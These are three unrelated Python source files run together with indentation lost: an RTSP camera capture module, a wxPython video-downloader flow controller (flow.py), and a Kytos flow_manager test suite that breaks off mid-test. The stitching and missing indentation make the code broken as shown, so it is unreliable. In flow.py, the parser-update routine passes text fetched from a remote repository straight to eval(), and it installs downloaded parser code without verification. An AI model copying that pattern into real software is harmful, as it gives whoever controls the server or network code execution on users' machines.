from mini_vstreamer.api.defaults import system
from mini_vstreamer.core.config import Configurable
from mini_vstreamer.core.thread import Runnable
from threading import Thread
from time import time, sleep
import cv2
import logging
import subprocess
def open_gst_rtsp(uri, width=None, height=None, latency=2000):
"""Open an RTSP URI (IP CAM)."""
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'omxh264dec' in gst_elements:
if width is not None and height is not None:
xraw = 'video/x-raw, width=(int){}, height=(int){}, '.format(width, height)
elif width is not None and height is None:
xraw = 'video/x-raw, width=(int){}, '.format(width)
elif width is None and height is not None:
xraw = 'video/x-raw, height=(int){}, '.format(height)
else:
xraw = 'video/x-raw, '
# Uses NVDEC H.264 decoder on Jetson
gst_str = ('rtspsrc location={} latency={} ! '
'rtph264depay ! h264parse ! omxh264dec ! '
'nvvidconv ! '
+ xraw +
'format=(string)BGRx ! videoconvert ! '
'appsink').format(uri, latency, width, height)
elif 'avdec_h264' in gst_elements:
# Software decoder avdec_h264
gst_str = ('rtspsrc location={} latency={} ! '
'rtph264depay ! h264parse ! avdec_h264 ! '
'videoconvert ! appsink').format(uri, latency)
else:
raise RuntimeError('H.264 decoder not found!')
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
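# Minimal usage sketch (URI, credentials and size below are hypothetical):
#   cap = open_gst_rtsp('rtsp://user:pass@192.168.1.10:554/stream1',
#                       width=1280, height=720, latency=2000)
#   ok, frame = cap.read()  # frame is a BGR image when ok is True
# The pipeline requires the GStreamer elements checked above to be installed
# and OpenCV built with GStreamer support; otherwise
# RuntimeError('H.264 decoder not found!') is raised or the capture fails.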
class Camera(Configurable, Runnable):
"""
Camera Object
"""
def __init__(self, index, configio, system):
Configurable.__init__(self, index, configio, system, 'cameras')
Runnable.__init__(self, self.get('name'))
self.__ommitCheckQIn__ = True
self.__outQ__ = None
self.__videoCapture__ = None
self.setQueues()
def set(self, key, value):
Configurable.set(self, key, value)
if key == 'qOut':
self.setQueues()
def __open(self):
if self.__videoCapture__ is None:
if self.get('gstEnable', False):
self.__videoCapture__ = open_gst_rtsp(self.get('videoURL'), latency=self.get('latency', 2000))
else:
self.__videoCapture__ = cv2.VideoCapture(self.get('videoURL'))
self.__measureFPS()
else:
logging.warning('Camera {} already opened'.format(self.get('name')))
def __measureFPS(self):
if self.__videoCapture__ is None:
logging.warning('Camera {} is not opened'.format(self.get('name')))
return
currentFPS = int(self.__videoCapture__.get(cv2.CAP_PROP_FPS))
defaultFPS = self.get('defaultFPS', 2)
if currentFPS > 120 or currentFPS <= 0:
logging.warning('Camera {} using defaultFPS:{}, currentFPS:{} invalid'.format(self.get('name'), defaultFPS, currentFPS))
self.__videoFPS__ = defaultFPS
else:
if defaultFPS != currentFPS:
logging.warning('Camera {} using currentFPS:{}, preferred over defaultFPS:{}'.format(self.get('name'), currentFPS, defaultFPS))
self.__videoFPS__ = currentFPS
self.__wait__ = 1.0 / self.__videoFPS__
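# Example: a capture reporting 25 FPS gives __wait__ = 1 / 25 = 0.04 s between
# reads; a bogus value (<= 0 or > 120) falls back to defaultFPS (2 unless
# configured), i.e. __wait__ = 0.5 s.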
def __release(self):
try:
self.__videoCapture__.release()
except Exception:
pass
self.__videoCapture__ = None
def run(self):
self.__open()
while self.__running__:
sleep(self.__wait__)
self.__videoCapture__.grab()
_, frame = self.__videoCapture__.read()
if frame is None:
logging.error('Camera {} error loading frame'.format(self.get('name')))
self.__release()
self.__open()
self.__measureFPS()
else:
self.__outQ__.put((self.get('name'), frame))
self.__release()
return self
def independent_start(config):
system['cameras'] = {}
for index, config_element in enumerate(config['cameras']):
camera_name = config_element['name']
system['cameras'][camera_name] = Camera(index, config, system)
system['cameras'][camera_name].start()
def mutate_system(config):
if system.get('queues') is None:
message = 'system without queues initialized, try calling stream.ymsqueues.mutate_system(system, configio_of_queues)'
logging.error(message)
raise Exception(message)
else:
c_thread = Thread(name='CameraStarter', target=independent_start, args=(config,))
c_thread.daemon = True
c_thread.start()
flow.py
# -*- coding: UTF-8 -*-
"""
Flow:
[load config]
|
[check undone job]
/ \
/ \
(do)/ \(skip)
[parse background] [show parser frame]
| \
| (button_godownload) \
[go download] <------------------- [handle frame parser]
/ \
(done)/ \ (close win)
[go merge] [save config] ------> [END]
/ \
/ \
/ \
(done)/ (done) \(close win)
[save config] <------- [wait for merge done]
|
|
[END]
"""
from handler import settings, parser, downloader, merger
import wx
import gui
from gui import format_byte
import CommonVar as cv
import socket, os, shutil
from urllib.error import URLError
from ssl import SSLError
import threading
import pyperclip
import nbdler
from zipfile import ZipFile
from core.common import BasicUrlGroup
import traceback
# import io, importlib
from hashlib import md5
from urllib.request import urlopen, Request
from urllib.parse import urljoin
from core.common import raw_decompress
import gzip, json
TOOL_REQ_URL = {
'ffmpeg': 'https://ffmpeg.zeranoe.com/builds/win64/static/ffmpeg-3.2-win64-static.zip',
'node': 'https://npm.taobao.org/mirrors/node/v10.15.3/win-x64/node.exe',
}
HEADERS = {
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip',
'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
}
class Entry:
"""Flow Entry"""
@staticmethod
def handle():
settings.loadConfig()
if GetTool.handle():
LoadParserCore.handle()
UndoneJob.handle()
else:
ShutDown.handle()
class LoadParserCore:
@staticmethod
def handle():
err_msg = parser.init()
if err_msg:
dlg = wx.MessageDialog(gui.frame_parse, '\n'.join(err_msg), u'核心加载错误信息', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
class GetTool:
@staticmethod
def handle():
if not GetTool.checkNode():
return False
if not GetTool.checkFfmpeg():
return False
return True
@staticmethod
def unzip_ffmpeg(zipfile):
with ZipFile(zipfile, 'r') as f:
top_path = f.namelist()[0]
target_path = os.path.join(top_path.rstrip('/').rstrip('\\'), 'bin', 'ffmpeg.exe').replace('\\', '/')
f.extract(target_path, '.')
shutil.move(os.path.join(top_path.rstrip('/').rstrip('\\'), 'bin', 'ffmpeg.exe'), 'ffmpeg.exe')
os.remove(zipfile)
os.removedirs(os.path.join(top_path.rstrip('/').rstrip('\\'), 'bin'))
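# Sketch of the expected archive layout (assuming the zip's top-level folder
# matches the archive name, which is not guaranteed): for
# ffmpeg-3.2-win64-static.zip the first entry would be
# 'ffmpeg-3.2-win64-static/', so 'ffmpeg-3.2-win64-static/bin/ffmpeg.exe' is
# extracted, moved to ./ffmpeg.exe, and the emptied bin/ directory is removed.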
@staticmethod
def checkFfmpeg():
dlm = nbdler.Manager()
if (not os.path.exists('ffmpeg.exe') or os.path.exists('ffmpeg.exe.nbdler')) and not os.path.exists(cv.FFMPEG_PATH):
dlg = wx.MessageDialog(None, u'该程序需要ffmpeg.exe才能完成工作,是否要下载?', u'提示', wx.YES_NO | wx.ICON_INFORMATION)
if dlg.ShowModal() != wx.ID_YES:
return False
dl = nbdler.open(urls=[TOOL_REQ_URL['ffmpeg']],
max_conn=16, filename='ffmpeg.zip')
dlm.addHandler(dl)
dlg = gui.DialogGetTool(gui.frame_downloader, u'正在下载 Ffmpeg 3.2.zip', dl.getFileSize(), dlm)
dlg.Bind(wx.EVT_TIMER, GetTool._process, dlg.timer)
dlg.timer.Start(50, oneShot=False)
dlm.run()
msg = dlg.ShowModal()
if not dlm.isEnd():
dlm.shutdown()
dlg.Destroy()
return False
GetTool.unzip_ffmpeg('ffmpeg.zip')
if msg == wx.ID_OK:
return True
else:
return False
else:
return True
@staticmethod
def checkNode():
dlm = nbdler.Manager()
if not os.path.exists('node.exe') or os.path.exists('node.exe.nbdler'):
dlg = wx.MessageDialog(None, u'该程序需要Nodejs.exe才能完成工作,是否要下载?', u'提示', wx.YES_NO | wx.ICON_INFORMATION)
if dlg.ShowModal() != wx.ID_YES:
return False
dl = nbdler.open(urls=[TOOL_REQ_URL['node']],
max_conn=16, filename='node.exe')
dlm.addHandler(dl)
dlg = gui.DialogGetTool(gui.frame_downloader, u'正在下载 Nodejs v10.15.3', dl.getFileSize(), dlm)
dlg.Bind(wx.EVT_TIMER, GetTool._process, dlg.timer)
dlg.timer.Start(50, oneShot=False)
dlm.run()
msg = dlg.ShowModal()
dlm.shutdown()
dlg.Destroy()
if msg == wx.ID_OK:
return True
else:
return False
else:
return True
@staticmethod
def _process(event):
dlg = event.Timer.GetOwner()
dlm = dlg.dlm
runs = dlm.getRunQueue()
if runs:
dl = dlm.getHandler(id=runs[0])
dlg.update(dl.getIncByte(), dl.getFileSize())
if dlm.isEnd():
dones = dlm.getDoneQueue()
if dones:
dl = dlm.getHandler(id=dones[0])
dlg.update(dl.getFileSize(), dl.getFileSize())
event.Timer.Stop()
dlg.EndModal(wx.ID_OK)
class UndoneJob:
"""Undone Job Handler:
handles the case where the window was closed last time while a job was still running.
"""
@staticmethod
def handle():
if cv.UNDONE_JOB:
if 'url' not in cv.UNDONE_JOB or 'quality' not in cv.UNDONE_JOB or 'features' not in cv.UNDONE_JOB:
ConfigSettings.fail()
FrameParser.handle()
else:
msg = '[Url]: %s\n[Title]: %s\n[Quality]: %s\n上一次任务尚未完成,是否继续任务?' \
% (cv.UNDONE_JOB['url'], cv.UNDONE_JOB.get('title'), cv.UNDONE_JOB['quality'])
dlg = wx.MessageDialog(None, msg, '提示', wx.YES_NO | wx.ICON_INFORMATION)
if dlg.ShowModal() == wx.ID_YES:
UndoneJob.do()
else:
UndoneJob.skip()
dlg.Destroy()
else:
FrameParser.handle()
@staticmethod
def do():
threading.Thread(target=UndoneJob._do).start()
@staticmethod
def _do():
def __(sel_res):
if not sel_res:
ShutDown.handle()
return
if FrameParser.MenuGoDownload.handler_audio(sel_res):
FrameDownload.handle()
else:
FrameParser.handle()
try:
url = cv.UNDONE_JOB['url']
quality = cv.UNDONE_JOB['quality']
features = cv.UNDONE_JOB['features']
sel_res = parser.matchParse(url, quality, features)
except (socket.timeout, URLError, SSLError):
wx.CallAfter(UndoneJob.timeout)
else:
if not sel_res:
wx.CallAfter(UndoneJob.empty)
else:
cv.SEL_RES = sel_res
wx.CallAfter(__, sel_res)
@staticmethod
def empty():
dlg = wx.MessageDialog(gui.frame_parse, u'数据返回为空。', u'错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
@staticmethod
def timeout():
dlg = wx.MessageDialog(gui.frame_parse, u'请求超时,是否重试?', u'错误', wx.YES_NO | wx.ICON_ERROR)
if dlg.ShowModal() == wx.ID_YES:
UndoneJob.do()
else:
UndoneJob.skip()
dlg.Destroy()
@staticmethod
def skip():
FrameParser.handle()
class FrameParser:
"""Frame Parser Flow Handler"""
@staticmethod
def handle():
gui.frame_parse.Show()
# if gui.frame_parse.ShowModal() == cv.ID_PARSER_GODOWNLOAD:
# FrameDownload.handle()
# else:
# ShutDown.handle()
class ButtonParse:
"""Frame Parser Button-[Parser] Handler"""
@staticmethod
def handle():
gui.frame_parse.button_parse.Enable(False)
url = gui.frame_parse.textctrl_url.GetLineText(0)
qualitys = []
for i in range(1, 7):
if getattr(gui.frame_parse, 'checkbox_%d' % i).GetValue():
qualitys.append(i)
threading.Thread(target=FrameParser.ButtonParse._parse, args=(url, qualitys,), daemon=True).start()
@staticmethod
def timeout():
dlg = wx.MessageDialog(gui.frame_parse, u'请求超时,请重试!', u'错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
@staticmethod
def empty():
dlg = wx.MessageDialog(gui.frame_parse, u'数据返回为空。', u'错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
@staticmethod
def exception(msg):
wx.MessageDialog(gui.frame_parse, msg, u'解析异常', wx.OK | wx.ICON_ERROR).ShowModal()
@staticmethod
def _parse(url, qualitys):
try:
res = parser.parse(url, qualitys)
except (socket.timeout, URLError, SSLError):
wx.CallAfter(FrameParser.ButtonParse.timeout)
except Exception as e:
msg = traceback.format_exc()
# print(traceback.format_exc())
wx.CallAfter(FrameParser.ButtonParse.exception, msg)
else:
if not res:
wx.CallAfter(FrameParser.ButtonParse.empty)
else:
wx.CallAfter(FrameParser.ButtonParse.appendItem, res)
finally:
wx.CallAfter(gui.frame_parse.button_parse.Enable, True)
wx.CallAfter(gui.frame_parse.button_parse.SetLabelText, u'解析')
@staticmethod
def appendItem(res):
gui.frame_parse.listctrl_parse.DeleteAllItems()
# try:
for i in res:
audios_info = i.getAllAudioInfo()
file_num_str = i.getVideoTotal() if not audios_info else '%d+%d' % (i.getVideoTotal(), i.getAudioTotal())
file_size_str = format_byte(i.getVideoSize(), '%.1f%s' if not audios_info else '%.1f%s+')
data = (i.getQuality(), i.getScreenSize(), file_num_str, file_size_str,
str(len(audios_info)) if audios_info else 0,
i.getFileFormat(),
u'√' if i.getM3U8() else u'×')
gui.frame_parse.listctrl_parse.Append(data)
gui.frame_parse.SetTitle(res[0].getVideoLegalTitle())
class MenuCopyLink:
"""Frame Parser Button-[Copy] Handler"""
@staticmethod
def handle():
index = gui.frame_parse.listctrl_parse.GetFirstSelected()
if index != -1:
# dlg = gui.DialogCopyLink(gui.frame_parse)
gui.dialog_copylink.listctrl_links.DeleteAllItems()
wx.CallAfter(gui.dialog_copylink.ShowModal)
sel_res = parser.getRespond()[index]
threading.Thread(target=FrameParser.MenuCopyLink._getinfo, args=(sel_res,)).start()
@staticmethod
def _getinfo(sel_res):
cv.CPYLINK_SEL_ITEMS = {}
cv.LISTCTRL_ITEMS = []
if sel_res.getM3U8():
data = ('', u'', u'√', 'V', u'以下是M3U8内容')
cv.LISTCTRL_ITEMS.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data, wx.Colour(255, 0, 0))
data = ('0', u'', u'√', 'V', sel_res.getM3U8())
cv.CPYLINK_SEL_ITEMS['video_m3u8'] = [data]
cv.LISTCTRL_ITEMS.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
if sel_res.getM3U8Urls():
data = ('', u'√', u'', 'V', u'以下是M3U8链接')
cv.LISTCTRL_ITEMS.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data, wx.Colour(255, 0, 0))
tmp = []
for i, j in enumerate(sel_res.getM3U8Urls()):
data = (str(i), u'√', u'', 'V', str(j))
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
cv.CPYLINK_SEL_ITEMS['video_m3u8'] = tmp
cv.LISTCTRL_ITEMS.extend(tmp)
if sel_res.getVideoUrls():
data = ('', u'√', u'', 'V', u'以下是目标视频下载链接')
cv.LISTCTRL_ITEMS.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data, wx.Colour(0, 0, 255))
tmp = []
for m, i in enumerate(sel_res.getVideoUrls()):
if isinstance(i, BasicUrlGroup):
for n, j in enumerate(i):
if isinstance(j, list) or isinstance(j, tuple):
preview = j[0]
elif isinstance(j, str):
preview = j
else:
raise TypeError()
data = ('%d(%03d)' % (m, n), u'√', u'', 'V', preview)
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
elif isinstance(i, list) or isinstance(i, tuple):
data = (str(m), u'√', u'', 'V', i[0])
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
elif isinstance(i, str):
data = (str(m), u'√', u'', 'V', i)
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
else:
raise TypeError()
cv.CPYLINK_SEL_ITEMS['video_links'] = tmp
cv.LISTCTRL_ITEMS.extend(tmp)
if sel_res.getAudioUrls():
data = ('', u'√', u'', 'A', u'以下是目标音频下载链接')
cv.LISTCTRL_ITEMS.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data, wx.Colour(0, 0, 255))
tmp = []
for m, i in enumerate(sel_res.getAudioUrls()):
if isinstance(i, BasicUrlGroup):
for n, j in enumerate(i):
if isinstance(j, list) or isinstance(j, tuple):
preview = j[0]
elif isinstance(j, str):
preview = j
else:
raise TypeError()
data = ('%d(%03d)' % (m, n), u'√', u'', 'A', preview)
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
elif isinstance(i, list) or isinstance(i, tuple):
data = (str(m), u'√', u'', 'A', i[0])
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
elif isinstance(i, str):
data = (str(m), u'√', u'', 'A', i)
tmp.append(data)
wx.CallAfter(gui.dialog_copylink.listctrl_links.Append, data)
else:
raise TypeError()
cv.CPYLINK_SEL_ITEMS['audio_links'] = tmp
cv.LISTCTRL_ITEMS.extend(tmp)
@staticmethod
def timeout():
dlg = wx.MessageDialog(gui.dialog_copylink, u'请求超时,请重试!', u'错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
class UpdateParser:
@staticmethod
def handle():
parser_info = FrameParser.UpdateParser.prepare()
if parser_info:
FrameParser.UpdateParser.do(parser_info)
else:
dlg = wx.MessageDialog(gui.frame_downloader, '解析核心已经是最新了!', '提示', wx.OK | wx.ICON_INFORMATION)
dlg.ShowModal()
dlg.Destroy()
@staticmethod
def prepare():
req = Request(urljoin(cv.REPO, 'repo'), headers=HEADERS)
res = urlopen(req)
text = raw_decompress(res.read(), res.info())
parser_info = eval(text)
for i, j in list(parser_info.items()):
if os.path.exists(os.path.join(cv.PARSER_PATH, i)):
with open(os.path.join(cv.PARSER_PATH, i), 'rb') as f:
_md5 = md5()
_md5.update(f.read())
if _md5.hexdigest() == j:
del parser_info[i]
return parser_info
@staticmethod
def do(parser_info):
avl = list(parser_info.keys())
dlg = wx.MultiChoiceDialog(gui.frame_parse, u'以下核心可以更新', u'更新核心', avl)
if dlg.ShowModal() != wx.ID_OK:
dlg.Destroy()
return False
sel = dlg.GetSelections()
for i in sel:
# for i, j in parser_info.items():
dlm = nbdler.Manager()
dl = nbdler.open(urls=[urljoin(cv.REPO, avl[i])], max_conn=3, filename=avl[i] + '.gzip', block_size=1,
filepath=cv.PARSER_PATH)
dlm.addHandler(dl)
dlg = gui.DialogGetTool(gui.frame_parse, u'正在下载 %s.gzip' % avl[i], dl.getFileSize(), dlm)
dlg.Bind(wx.EVT_TIMER, GetTool._process, dlg.timer)
dlg.timer.Start(50, oneShot=False)
dlm.run()
msg = dlg.ShowModal()
if msg != wx.ID_OK:
return False
else:
try:
with open(os.path.join(cv.PARSER_PATH, avl[i]), 'w') as f:
f.write(gzip.open(os.path.join(cv.PARSER_PATH, avl[i] + '.gzip')).read().decode('utf-8'))
os.remove(os.path.join(cv.PARSER_PATH, avl[i] + '.gzip'))
except:
dlg = wx.MessageDialog(gui.frame_parse, traceback.format_exc(), avl[i], wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
dlg.Destroy()
dlg = wx.MessageDialog(gui.frame_parse, '核心更新完成!', '提示', wx.OK | wx.ICON_INFORMATION)
dlg.ShowModal()
dlg.Destroy()
LoadParserCore.handle()
class MenuGoDownload:
"""Frame Parser Button-[GoDownload] Handler"""
@staticmethod
def handle():
gui.frame_parse.listctrl_parse.menu.godownload.Enable(False)
index = gui.frame_parse.listctrl_parse.GetFirstSelected()
if index != -1:
sel_res = parser.getRespond()[index]
if FrameParser.MenuGoDownload.handler_audio(sel_res):
threading.Thread(target=FrameParser.MenuGoDownload._download, args=(sel_res,)).start()
@staticmethod
def handler_audio(sel_res):
audio_info = sel_res.getAllAudioInfo()
if audio_info:
dlg = wx.SingleChoiceDialog(gui.frame_parse, u'Pick the AUDIO you prefer', u'Audio Choice', audio_info)
if dlg.ShowModal() == wx.ID_OK:
index = audio_info.index(dlg.GetStringSelection())
sel_res.setSelAudio(index)
dlg.Destroy()
else:
dlg.Destroy()
return False
return True
@staticmethod
def timeout():
dlg = wx.MessageDialog(gui.frame_parse, u'Msg:\"请求被服务器中止或网络超时。\"', u'错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
# gui.frame_parse.button_godownload.Enable(True)
@staticmethod
def _download(sel_res):
try:
sel_res.getVideoUrls()
except:
wx.CallAfter(FrameParser.MenuGoDownload.timeout)
else:
cv.SEL_RES = sel_res
wx.CallAfter(FrameDownload.handle)
finally:
gui.frame_parse.listctrl_parse.menu.godownload.Enable(True)
class FrameDownload:
"""Frame Download Handler"""
@staticmethod
def handle():
# io
# gui.dialog_dllog.start_logger()
gui.frame_parse.Hide()
FrameDownload.Download.handle()
class Download:
"""Frame Download - [Download] Handler"""
@staticmethod
def handle():
downloader.init()
FrameDownload.Download.prepare()
downloader.run()
threading.Thread(target=FrameDownload.Download._download_insp).start()
@staticmethod
def prepare():
downloader.prepare(cv.SEL_RES)
gui.frame_downloader.setTitleName(cv.SEL_RES.getVideoLegalTitle())
gui.frame_downloader.initTotal(cv.SEL_RES.getTotalFileSize())
for i in range(cv.SEL_RES.getVideoTotal()):
gui.frame_downloader.insertBlock(i)
for i in range(cv.SEL_RES.getAudioTotal()):
gui.frame_downloader.insertBlock(i + cv.SEL_RES.getVideoTotal())
gui.setTimerHandler(downloader.getProcessEvent())
gui.runTimer(500, False)
gui.frame_downloader.Show(True)
@staticmethod
def _download_insp():
downloader.join()
if cv.SHUTDOWN:
url = cv.SEL_RES.getBaseUrl()
quality = cv.SEL_RES.getQuality()
title = cv.SEL_RES.getVideoLegalTitle()
settings.setUndoneJob(url, title, quality, cv.SEL_RES.getFeatures())
settings.saveConfig()
# wx.CallAfter(ShutDown.handle)
else:
wx.CallAfter(Merge.handle)
class Merge:
"""Frame Download Handler"""
@staticmethod
def handle():
if not downloader.isAllDone():
Merge.fileNotAllFound()
else:
Merge.prepare()
Merge.do()
@staticmethod
def prepare():
gui.frame_downloader.Hide()
gui.frame_merger.Show()
@staticmethod
def do():
# if downloader.getAllAudioFilePath():
# wx.CallAfter(gui.frame_merger.Show)
threading.Thread(target=Merge._do).start()
@staticmethod
def _do():
video_src = downloader.getAllVideoFilePath()
audio_src = downloader.getAllAudioFilePath()
video_dst = downloader.getDstVideoFilePath()
audio_dst = downloader.getDstAudioFilePath()
if video_src:
if len(video_src) == 1 and cv.TARGET_FORMAT == '':
shutil.move(video_src[0], video_dst)
else:
# mer = merger.make(video_dst, video_src, method=merger.MET_CONCAT, merger=cv.SEL_RES.getConcatMerger())
mer = merger.make(video_dst, video_src, cv.SEL_RES.getConcatMethod())
mer.start()
mer.join()
if audio_src:
if len(audio_src) == 1 and cv.TARGET_FORMAT == '':
shutil.move(audio_src[0], audio_dst)
else:
# mer = merger.make(audio_dst, audio_src, method=merger.MET_CONCAT, merger=cv.SEL_RES.getConcatMerger())
mer = merger.make(audio_dst, audio_src, cv.MER_CONCAT_DEMUXER)
mer.start()
mer.join()
if video_src and audio_src:
src = [video_dst, audio_dst]
dst = downloader.getDstFilePath()
mer = merger.make(dst, src, cv.MER_VIDEO_AUDIO)
mer.start()
mer.join()
dst = downloader.getDstFilePath() + cv.TARGET_FORMAT
settings.clearUndoneJob()
settings.saveConfig()
if not cv.SHUTDOWN:
if os.path.exists(dst):
wx.CallAfter(Merge.success)
else:
wx.CallAfter(Merge.fail)
@staticmethod
def fail():
dlg = wx.MessageDialog(gui.frame_downloader, '发生未知错误,无法生成最终视频!', '错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
@staticmethod
def fileNotAllFound():
dlg = wx.MessageDialog(gui.frame_downloader, '未找到所有分段文件,请重启程序重试!', '错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
@staticmethod
def success():
cv.ALLTASKDONE = True
dlg = wx.MessageDialog(gui.frame_downloader, u'视频已经合并完成,是否删除分段文件?', u'提示', wx.YES_NO | wx.ICON_INFORMATION)
if dlg.ShowModal() == wx.ID_YES:
merger.del_src_files()
dlg = wx.MessageDialog(gui.frame_downloader, u'分段文件删除完成。', u'提示')
dlg.ShowModal()
dlg.Destroy()
class ConfigSettings:
@staticmethod
def fail():
settings.initConfig()
dlg = wx.MessageDialog(gui.frame_parse, 'config.ini文件错误。', '错误', wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
class ShutDown:
@staticmethod
def handle():
gui.dialog_dllog.Show()
threading.Thread(target=ShutDown._do).start()
@staticmethod
def _do():
thr = threading.Thread(target=ShutDown._shutdown)
thr.start()
thr.join()
wx.CallAfter(ShutDown.destroy_frame)
@staticmethod
def destroy_frame():
gui.dialog_dllog.Destroy()
gui.frame_parse.Destroy()
gui.frame_downloader.Destroy()
gui.frame_merger.Destroy()
@staticmethod
def _shutdown():
cv.SHUTDOWN = True
merger.shutdown()
downloader.shutdown()
@staticmethod
def frame_parser_close(event):
if cv.SHUTDOWN:
event.Skip()
else:
gui.frame_parse.Hide()
ShutDown.handle()
@staticmethod
def frame_downloader_close(event):
if cv.SHUTDOWN:
event.Skip()
else:
dlg = wx.MessageDialog(gui.frame_downloader, u'你确定要中止下载吗?', u'提示', style=wx.YES_NO | wx.ICON_INFORMATION)
if dlg.ShowModal() == wx.ID_YES:
gui.frame_downloader.Hide()
ShutDown.handle()
dlg.Destroy()
@staticmethod
def frame_merger_close(event):
if cv.SHUTDOWN:
event.Skip()
else:
if not cv.ALLTASKDONE:
dlg = wx.MessageDialog(gui.frame_merger, u'你确定要中止操作吗?', u'提示', style=wx.YES_NO | wx.ICON_INFORMATION)
if dlg.ShowModal() == wx.ID_YES:
gui.frame_merger.Hide()
ShutDown.handle()
dlg.Destroy()
else:
gui.frame_merger.Hide()
ShutDown.handle()
class CopyLink:
@staticmethod
def handle():
pass
@staticmethod
def copysel():
cpy_list = []
next_index = gui.dialog_copylink.listctrl_links.GetFirstSelected()
while next_index != -1:
data = cv.LISTCTRL_ITEMS[next_index][4]
cpy_list.append(data)
next_index = gui.dialog_copylink.listctrl_links.GetNextSelected(next_index)
pyperclip.copy('\n'.join(cpy_list))
CopyLink.success()
@staticmethod
def copygroup():
sel_index = gui.dialog_copylink.listctrl_links.GetFirstSelected()
sel_key = ''
link_text = gui.dialog_copylink.listctrl_links.GetItemText(sel_index, 1)
type_text = gui.dialog_copylink.listctrl_links.GetItemText(sel_index, 3)
if link_text == u'√' and type_text == 'V':
sel_key = 'video_links'
elif link_text != u'√' and type_text == 'V':
sel_key = 'video_m3u8'
elif link_text == u'√' and type_text == 'A':
sel_key = 'audio_links'
if sel_key:
content_list = [i[4] for i in cv.CPYLINK_SEL_ITEMS[sel_key]]
pyperclip.copy('\n'.join(content_list))
CopyLink.success()
@staticmethod
def success():
dlg = wx.MessageDialog(gui.dialog_copylink, u'写入到剪切板成功!', u'完成')  # "Copied to the clipboard successfully!", "Done"
dlg.ShowModal()
dlg.Destroy()
|
test_main.py
|
"""Test Main methods."""
import threading
from unittest import TestCase
from unittest.mock import MagicMock, patch
from uuid import uuid4
from napps.kytos.flow_manager.exceptions import (
InvalidCommandError,
SwitchNotConnectedError,
)
from napps.kytos.flow_manager.main import FlowEntryState
from kytos.core.helpers import now
from kytos.lib.helpers import (
get_connection_mock,
get_controller_mock,
get_kytos_event_mock,
get_switch_mock,
get_test_client,
)
# pylint: disable=too-many-lines,fixme
# TODO split this test suite in smaller ones
# pylint: disable=protected-access, too-many-public-methods
class TestMain(TestCase):
"""Tests for the Main class."""
API_URL = "http://localhost:8181/api/kytos/flow_manager"
def setUp(self):
patch("kytos.core.helpers.run_on_thread", lambda x: x).start()
# pylint: disable=import-outside-toplevel
from napps.kytos.flow_manager.main import Main
self.addCleanup(patch.stopall)
controller = get_controller_mock()
self.switch_01 = get_switch_mock("00:00:00:00:00:00:00:01", 0x04)
self.switch_01.is_enabled.return_value = True
self.switch_01.flows = []
self.switch_02 = get_switch_mock("00:00:00:00:00:00:00:02", 0x04)
self.switch_02.is_enabled.return_value = False
self.switch_02.flows = []
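# Note: switch_01 is enabled while switch_02 is disabled; several tests below rely on this split.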
controller.switches = {
"00:00:00:00:00:00:00:01": self.switch_01,
"00:00:00:00:00:00:00:02": self.switch_02,
}
self.napp = Main(controller)
def test_rest_list_without_dpid(self):
"""Test list rest method withoud dpid."""
flow_dict = {
"priority": 13,
"cookie": 84114964,
"command": "add",
"match": {"dl_dst": "00:15:af:d5:38:98"},
}
flow_dict_2 = {
"priority": 18,
"cookie": 84114964,
"command": "add",
"match": {"dl_dst": "00:15:af:d5:38:98"},
}
flow_1 = MagicMock()
flow_1.as_dict.return_value = flow_dict
flow_2 = MagicMock()
flow_2.as_dict.return_value = flow_dict_2
self.switch_01.flows.append(flow_1)
self.switch_02.flows.append(flow_2)
api = get_test_client(self.napp.controller, self.napp)
url = f"{self.API_URL}/v2/flows"
response = api.get(url)
expected = {
"00:00:00:00:00:00:00:01": {"flows": [flow_dict]},
"00:00:00:00:00:00:00:02": {"flows": [flow_dict_2]},
}
self.assertEqual(response.json, expected)
self.assertEqual(response.status_code, 200)
def test_rest_list_with_dpid(self):
"""Test list rest method with dpid."""
flow_dict = {
"priority": 13,
"cookie": 84114964,
"command": "add",
"match": {"dl_dst": "00:15:af:d5:38:98"},
}
flow_1 = MagicMock()
flow_1.as_dict.return_value = flow_dict
self.switch_01.flows.append(flow_1)
api = get_test_client(self.napp.controller, self.napp)
url = f"{self.API_URL}/v2/flows/00:00:00:00:00:00:00:01"
response = api.get(url)
expected = {"00:00:00:00:00:00:00:01": {"flows": [flow_dict]}}
self.assertEqual(response.json, expected)
self.assertEqual(response.status_code, 200)
def test_list_flows_fail_case(self):
"""Test the failure case to recover all flows from a switch by dpid.
Failure case: Switch not found.
"""
api = get_test_client(self.napp.controller, self.napp)
